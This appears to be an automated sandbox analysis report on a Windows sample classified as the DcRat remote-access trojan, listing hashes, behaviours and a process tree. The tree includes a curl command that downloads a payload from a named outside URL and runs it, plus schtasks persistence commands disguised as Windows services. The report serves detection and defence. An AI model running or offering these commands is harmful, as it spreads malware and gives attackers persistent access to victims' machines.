Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-01-2025 05:36
Static task
static1
Behavioral task
behavioral1
Sample
private.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
private.exe
Resource
win10v2004-20241007-en
General
-
Target
private.exe
-
Size
854KB
-
MD5
53e14b277744d3c61cffb17f39ede98d
-
SHA1
c8482d3ec8cb10df2d9f660920ab5d839d6e450f
-
SHA256
f8b5a7f99a109c3bc007a3ef1e6fbbacbb0fae70951c3b020704df3106a54654
-
SHA512
140dffe4e715ccaeec37ae3da9734c0fbd2b6b1e4337d75621dc8714ec13ab572cc2ee5885a1ec196758637f27ac50ff3970396db5c20885234a4a2e1e47c8fb
-
SSDEEP
12288:Hnt46d+ktbUluYV/YH7Fso6veRSN2ff+zOe9egX7AlGq+nqnIr9BqiXb1FP:Hnt46Qi4ue/Do60OegX7Aoq+nmm7Vj
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3056 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1236 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4124 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 528 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 760 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2408 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2704 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1256 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4348 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2424 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3028 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3388 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1564 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 836 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3384 244 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4636 244 schtasks.exe 93 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation client.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe -
Executes dropped EXE 15 IoCs
pid Process 1232 client.exe 5108 chainreviewwinrefSvc.exe 2308 chainreviewwinrefSvc.exe 2984 chainreviewwinrefSvc.exe 2988 chainreviewwinrefSvc.exe 3380 chainreviewwinrefSvc.exe 1724 chainreviewwinrefSvc.exe 4128 chainreviewwinrefSvc.exe 624 chainreviewwinrefSvc.exe 976 chainreviewwinrefSvc.exe 2984 chainreviewwinrefSvc.exe 1968 chainreviewwinrefSvc.exe 1256 chainreviewwinrefSvc.exe 1864 chainreviewwinrefSvc.exe 3784 chainreviewwinrefSvc.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Idle.exe chainreviewwinrefSvc.exe File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\6ccacd8608530f chainreviewwinrefSvc.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Speech\client.exe curl.exe File created C:\Windows\InputMethod\CHT\MoUsoCoreWorker.exe chainreviewwinrefSvc.exe File created C:\Windows\InputMethod\CHT\1f93f77a7f4778 chainreviewwinrefSvc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1768 PING.EXE 844 PING.EXE 4620 PING.EXE 1132 PING.EXE 964 PING.EXE 1148 PING.EXE 2828 PING.EXE 4448 PING.EXE 3604 PING.EXE 4316 PING.EXE -
Modifies registry class 15 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings client.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings chainreviewwinrefSvc.exe -
Runs ping.exe 1 TTPs 10 IoCs
pid Process 964 PING.EXE 844 PING.EXE 1148 PING.EXE 2828 PING.EXE 1768 PING.EXE 4316 PING.EXE 4620 PING.EXE 1132 PING.EXE 4448 PING.EXE 3604 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1236 schtasks.exe 4124 schtasks.exe 1256 schtasks.exe 1564 schtasks.exe 4636 schtasks.exe 528 schtasks.exe 760 schtasks.exe 2408 schtasks.exe 4348 schtasks.exe 836 schtasks.exe 3384 schtasks.exe 3332 schtasks.exe 2704 schtasks.exe 2424 schtasks.exe 4464 schtasks.exe 3056 schtasks.exe 3028 schtasks.exe 3388 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3204 private.exe 3204 private.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe 5108 chainreviewwinrefSvc.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 5108 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 2308 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 2984 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 2988 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 3380 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 1724 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 4128 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 624 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 976 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 2984 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 1968 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 1256 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 1864 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 3784 chainreviewwinrefSvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3204 wrote to memory of 5060 3204 private.exe 83 PID 3204 wrote to memory of 5060 3204 private.exe 83 PID 3204 wrote to memory of 368 3204 private.exe 84 PID 3204 wrote to memory of 368 3204 private.exe 84 PID 368 wrote to memory of 3592 368 cmd.exe 85 PID 368 wrote to memory of 3592 368 cmd.exe 85 PID 3204 wrote to memory of 2984 3204 private.exe 86 PID 3204 wrote to memory of 2984 3204 private.exe 86 PID 2984 wrote to memory of 1232 2984 cmd.exe 87 PID 2984 wrote to memory of 1232 2984 cmd.exe 87 PID 2984 wrote to memory of 1232 2984 cmd.exe 87 PID 1232 wrote to memory of 2596 1232 client.exe 88 PID 1232 wrote to memory of 2596 1232 client.exe 88 PID 1232 wrote to memory of 2596 1232 client.exe 88 PID 3204 wrote to memory of 2492 3204 private.exe 89 PID 3204 wrote to memory of 2492 3204 private.exe 89 PID 2596 wrote to memory of 5084 2596 WScript.exe 97 PID 2596 wrote to memory of 5084 2596 WScript.exe 97 PID 2596 wrote to memory of 5084 2596 WScript.exe 97 PID 5084 wrote to memory of 5108 5084 cmd.exe 99 PID 5084 wrote to memory of 5108 5084 cmd.exe 99 PID 5108 wrote to memory of 4900 5108 chainreviewwinrefSvc.exe 118 PID 5108 wrote to memory of 4900 5108 chainreviewwinrefSvc.exe 118 PID 4900 wrote to memory of 4868 4900 cmd.exe 120 PID 4900 wrote to memory of 4868 4900 cmd.exe 120 PID 4900 wrote to memory of 2212 4900 cmd.exe 121 PID 4900 wrote to memory of 2212 4900 cmd.exe 121 PID 4900 wrote to memory of 2308 4900 cmd.exe 122 PID 4900 wrote to memory of 2308 4900 cmd.exe 122 PID 2308 wrote to memory of 3688 2308 chainreviewwinrefSvc.exe 123 PID 2308 wrote to memory of 3688 2308 chainreviewwinrefSvc.exe 123 PID 3688 wrote to memory of 672 3688 cmd.exe 125 PID 3688 wrote to memory of 672 3688 cmd.exe 125 PID 3688 wrote to memory of 4620 3688 cmd.exe 126 PID 3688 wrote to memory of 4620 3688 cmd.exe 126 PID 3688 wrote to memory of 2984 3688 cmd.exe 129 PID 3688 wrote to memory of 2984 3688 cmd.exe 129 PID 2984 wrote to memory of 2416 2984 chainreviewwinrefSvc.exe 130 PID 2984 wrote to memory of 2416 2984 chainreviewwinrefSvc.exe 130 PID 2416 wrote to memory of 2948 2416 cmd.exe 132 PID 2416 wrote to memory of 2948 2416 cmd.exe 132 PID 2416 wrote to memory of 1132 2416 cmd.exe 133 PID 2416 wrote to memory of 1132 2416 cmd.exe 133 PID 2416 wrote to memory of 2988 2416 cmd.exe 134 PID 2416 wrote to memory of 2988 2416 cmd.exe 134 PID 2988 wrote to memory of 2040 2988 chainreviewwinrefSvc.exe 135 PID 2988 wrote to memory of 2040 2988 chainreviewwinrefSvc.exe 135 PID 2040 wrote to memory of 1756 2040 cmd.exe 137 PID 2040 wrote to memory of 1756 2040 cmd.exe 137 PID 2040 wrote to memory of 964 2040 cmd.exe 138 PID 2040 wrote to memory of 964 2040 cmd.exe 138 PID 2040 wrote to memory of 3380 2040 cmd.exe 139 PID 2040 wrote to memory of 3380 2040 cmd.exe 139 PID 3380 wrote to memory of 4608 3380 chainreviewwinrefSvc.exe 140 PID 3380 wrote to memory of 4608 3380 chainreviewwinrefSvc.exe 140 PID 4608 wrote to memory of 3040 4608 cmd.exe 142 PID 4608 wrote to memory of 3040 4608 cmd.exe 142 PID 4608 wrote to memory of 3676 4608 cmd.exe 143 PID 4608 wrote to memory of 3676 4608 cmd.exe 143 PID 4608 wrote to memory of 1724 4608 cmd.exe 144 PID 4608 wrote to memory of 1724 4608 cmd.exe 144 PID 1724 wrote to memory of 2036 1724 chainreviewwinrefSvc.exe 145 PID 1724 wrote to memory of 2036 1724 chainreviewwinrefSvc.exe 145 PID 4128 wrote to memory of 1012 4128 chainreviewwinrefSvc.exe 150 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\private.exe"C:\Users\Admin\AppData\Local\Temp\private.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:5060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe3⤵
- Drops file in Windows directory
PID:3592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\Speech\client.exeC:\Windows\Speech\client.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt/chainreviewwinrefSvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pj8vQuwPyQ.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\chcp.comchcp 650018⤵PID:4868
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2212
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WHqdBEPCKu.bat"9⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\system32\chcp.comchcp 6500110⤵PID:672
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4620
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5CZTOTC2vN.bat"11⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\chcp.comchcp 6500112⤵PID:2948
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1132
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\o1vNVowh3C.bat"13⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\chcp.comchcp 6500114⤵PID:1756
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:964
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kJRy2Wx8TR.bat"15⤵
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\system32\chcp.comchcp 6500116⤵PID:3040
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:216⤵PID:3676
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XA2Giq7lse.bat"17⤵PID:2036
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:4892
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4448
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XVflfzP3Wp.bat"19⤵PID:1012
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:3288
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:220⤵PID:5060
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:624 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lYG6WIxzfM.bat"21⤵PID:1832
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:4524
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3604
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:976 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5CZTOTC2vN.bat"23⤵PID:4920
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:2492
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1768
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\usSWzSdfMb.bat"25⤵PID:3532
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:1436
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:844
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1968 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7gEkM0BkJD.bat"27⤵PID:1692
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:528
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:228⤵PID:1640
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nSTk4tfYD6.bat"29⤵PID:4348
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:2168
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4316
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"30⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mm6E03wqrH.bat"31⤵PID:3864
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:2196
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1148
-
-
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt\chainreviewwinrefSvc.exe"32⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3784 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6RObsEBt7I.bat"33⤵PID:4128
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:4368
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2828
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe2⤵PID:2492
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 9 /tr "'C:\Windows\InputMethod\CHT\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Windows\InputMethod\CHT\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 11 /tr "'C:\Windows\InputMethod\CHT\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\ComponentCrt\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:528
-
